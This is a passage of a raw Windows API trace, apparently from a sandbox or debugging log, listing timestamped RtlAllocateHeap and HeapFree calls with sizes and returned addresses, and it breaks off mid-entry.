[0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x17) returned 0x4a8d00 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xf) returned 0x4a8d20 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x16) returned 0x4a8d40 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2a) returned 0x4b8510 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x29) returned 0x4b8710 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x12) returned 0x4a8d60 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x21) returned 0x4ab380 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x16) returned 0x4b90e0 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x22) returned 0x4ab3b0 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x12) returned 0x4b9340 [0175.411] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8ae0 | out: hHeap=0x4a0000) returned 1 [0175.412] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa3a7) returned 0x4b93e0 [0175.414] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ab3e0 [0175.414] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa3a7) returned 0x4c3790 [0175.415] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.415] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfef7) returned 0x4cdb40 [0175.418] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x40) returned 0x4b0d10 [0175.418] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfef7) returned 0x4dda40 [0175.420] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab3e0 | out: hHeap=0x4a0000) returned 1 [0175.420] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cdb40 | out: hHeap=0x4a0000) returned 1 [0175.420] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x450) returned 0x4b8910 [0175.421] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x450) returned 0x4ed940 [0175.421] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.421] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1ea7) returned 0x4edda0 [0175.421] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xf40) returned 0x4b93e0 [0175.637] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x7a0) returned 0x4ba330 [0175.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4edda0 | out: hHeap=0x4a0000) returned 1 [0175.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.637] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xbf0) returned 0x4b93e0 [0175.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba330 | out: hHeap=0x4a0000) returned 1 [0175.637] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x640) returned 0x4b8910 [0175.637] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1247) returned 0x4ed940 [0175.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.637] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x520) returned 0x4b8910 [0175.637] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1b56) returned 0x4b93e0 [0175.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.637] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8a0) returned 0x4ed940 [0175.637] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28ed) returned 0x4baf40 [0175.638] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.638] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.638] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x550) returned 0x4b8910 [0175.638] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.638] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2537) returned 0x4ed940 [0175.638] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12b7) returned 0x4b93e0 [0175.639] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x950) returned 0x4bd840 [0175.639] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.639] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.639] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x3d4f) returned 0x4be1a0 [0175.639] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4baf40 | out: hHeap=0x4a0000) returned 1 [0175.639] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bd840 | out: hHeap=0x4a0000) returned 1 [0175.639] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2377) returned 0x4ed940 [0175.639] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x11d7) returned 0x4c1f00 [0175.640] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8e0) returned 0x4b93e0 [0175.640] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.640] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c1f00 | out: hHeap=0x4a0000) returned 1 [0175.640] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.640] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5b0) returned 0x4b8910 [0175.640] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.640] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x640) returned 0x4b8910 [0175.640] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5be2) returned 0x4cdb40 [0175.641] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4be1a0 | out: hHeap=0x4a0000) returned 1 [0175.641] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.641] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x890) returned 0x4ed940 [0175.641] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xac0) returned 0x4ed940 [0175.642] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ab3e0 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x960) returned 0x4ed940 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x960) returned 0x4ee2b0 [0175.642] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x460) returned 0x4b8910 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe0f) returned 0x4eec20 [0175.642] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee2b0 | out: hHeap=0x4a0000) returned 1 [0175.642] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c17) returned 0x4d3730 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe00) returned 0x4ed940 [0175.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x700) returned 0x4d5350 [0175.643] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d3730 | out: hHeap=0x4a0000) returned 1 [0175.643] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.643] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x153d) returned 0x4d3730 [0175.643] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eec20 | out: hHeap=0x4a0000) returned 1 [0175.643] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d5350 | out: hHeap=0x4a0000) returned 1 [0175.643] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2277) returned 0x4ed940 [0175.643] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1157) returned 0x4d4c80 [0175.643] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8a0) returned 0x4d5de0 [0175.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d4c80 | out: hHeap=0x4a0000) returned 1 [0175.644] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1fc7) returned 0x4ed940 [0175.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d3730 | out: hHeap=0x4a0000) returned 1 [0175.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d5de0 | out: hHeap=0x4a0000) returned 1 [0175.644] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1657) returned 0x4d3730 [0175.644] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xb20) returned 0x4d4d90 [0175.644] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x590) returned 0x4ef910 [0175.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d3730 | out: hHeap=0x4a0000) returned 1 [0175.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d4d90 | out: hHeap=0x4a0000) returned 1 [0175.644] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2f96) returned 0x4d3730 [0175.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.644] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef910 | out: hHeap=0x4a0000) returned 1 [0175.644] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b47) returned 0x4d66d0 [0175.645] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x15b7) returned 0x4ed940 [0175.645] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xad0) returned 0x4eef00 [0175.646] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d66d0 | out: hHeap=0x4a0000) returned 1 [0175.646] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.646] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eef00 | out: hHeap=0x4a0000) returned 1 [0175.646] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2697) returned 0x4d66d0 [0175.646] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1367) returned 0x4ed940 [0175.646] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9a0) returned 0x4eecb0 [0175.646] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d66d0 | out: hHeap=0x4a0000) returned 1 [0175.646] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.646] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x474d) returned 0x4d66d0 [0175.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d3730 | out: hHeap=0x4a0000) returned 1 [0175.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eecb0 | out: hHeap=0x4a0000) returned 1 [0175.647] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x920) returned 0x4ed940 [0175.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.647] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1b47) returned 0x4ed940 [0175.647] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xd90) returned 0x4dae30 [0175.647] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6d0) returned 0x4ef490 [0175.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dae30 | out: hHeap=0x4a0000) returned 1 [0175.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef490 | out: hHeap=0x4a0000) returned 1 [0175.647] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5d0) returned 0x4b8910 [0175.647] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6adf) returned 0x4b93e0 [0175.647] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d66d0 | out: hHeap=0x4a0000) returned 1 [0175.648] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1887) returned 0x4ed940 [0175.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc30) returned 0x4ef1d0 [0175.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x620) returned 0x4b8910 [0175.648] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.648] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef1d0 | out: hHeap=0x4a0000) returned 1 [0175.648] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8f0) returned 0x4ed940 [0175.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x480) returned 0x4b8910 [0175.648] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x240) returned 0x4ee240 [0175.649] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.649] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.649] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee240 | out: hHeap=0x4a0000) returned 1 [0175.649] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x40) returned 0x4b07c0 [0175.649] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab3e0 | out: hHeap=0x4a0000) returned 1 [0175.649] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cdb40 | out: hHeap=0x4a0000) returned 1 [0175.649] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.650] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b07c0 | out: hHeap=0x4a0000) returned 1 [0175.650] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9900) returned 0x4b93e0 [0175.651] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1bf0) returned 0x4ed940 [0175.653] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.653] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9937) returned 0x4cdb40 [0175.654] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.654] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ab3e0 [0175.654] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9900) returned 0x4b93e0 [0175.654] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1bf0) returned 0x4ed940 [0175.654] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: hHeap=0x4a0000) returned 1 [0175.654] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9937) returned 0x4ed940 [0175.656] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0175.656] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x40) returned 0x4b01d0 [0175.656] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab3e0 | out: hHeap=0x4a0000) returned 1 [0175.656] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c3790 | out: hHeap=0x4a0000) returned 1 [0175.657] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dda40 | out: hHeap=0x4a0000) returned 1 [0175.657] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b0d10 | out: hHeap=0x4a0000) returned 1 [0175.657] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x4b93e0 [0175.657] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x4d7480 [0175.657] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4a8d80 [0175.657] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x4f7280 [0175.658] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9100 [0175.658] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8d80 | out: hHeap=0x4a0000) returned 1 [0175.658] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x50a490 [0175.659] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4b9360 [0175.659] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9100 | out: hHeap=0x4a0000) returned 1 [0175.659] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x51d6a0 [0175.659] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ab3e0 [0175.659] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9360 | out: hHeap=0x4a0000) returned 1 [0175.659] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x5308b0 [0175.660] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x30) returned 0x4b8410 [0175.660] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab3e0 | out: hHeap=0x4a0000) returned 1 [0175.660] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x543ac0 [0175.660] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x556cd0 [0175.661] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x48) returned 0x4b02c0 [0175.661] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8410 | out: hHeap=0x4a0000) returned 1 [0175.661] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x569ee0 [0175.661] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x57d0f0 [0175.662] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1e80080 [0175.663] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x68) returned 0x4a8d80 [0175.663] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b02c0 | out: hHeap=0x4a0000) returned 1 [0175.663] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1e93290 [0175.663] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1ea64a0 [0175.664] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1eb96b0 [0175.664] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1ecc8c0 [0175.664] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x98) returned 0x4a50b0 [0175.664] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8d80 | out: hHeap=0x4a0000) returned 1 [0175.664] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1edfad0 [0175.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1ef2ce0 [0175.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f05ef0 [0175.676] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f19100 [0175.676] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f2c310 [0175.677] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f3f520 [0175.678] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe0) returned 0x4a4ce0 [0175.678] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a50b0 | out: hHeap=0x4a0000) returned 1 [0175.678] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x1f52730 [0175.678] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2000080 [0175.680] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2013290 [0175.681] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20264a0 [0175.809] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20396b0 [0175.810] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x204c8c0 [0175.810] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x205fad0 [0175.811] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2072ce0 [0175.811] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2085ef0 [0175.812] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x150) returned 0x4ab0b0 [0175.812] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a4ce0 | out: hHeap=0x4a0000) returned 1 [0175.812] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2099100 [0175.813] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20ac310 [0175.813] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20bf520 [0175.814] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20d2730 [0175.814] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20e5940 [0175.815] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x20f8b50 [0175.815] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x210bd60 [0175.816] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x211ef70 [0175.816] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2132180 [0175.816] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2145390 [0175.817] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21585a0 [0175.817] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x216b7b0 [0175.818] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x217e9c0 [0175.818] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2191bd0 [0175.818] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1f8) returned 0x4b8910 [0175.818] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab0b0 | out: hHeap=0x4a0000) returned 1 [0175.818] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21a4de0 [0175.819] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21b7ff0 [0175.819] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21cb200 [0175.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x21de410 [0175.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2200080 [0175.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2213290 [0175.822] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22264a0 [0175.822] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22396b0 [0175.823] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x224c8c0 [0175.823] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x225fad0 [0175.824] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2272ce0 [0175.824] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2285ef0 [0175.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2299100 [0175.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22ac310 [0175.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22bf520 [0175.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22d2730 [0175.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22e5940 [0175.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x22f8b50 [0175.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x230bd60 [0175.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 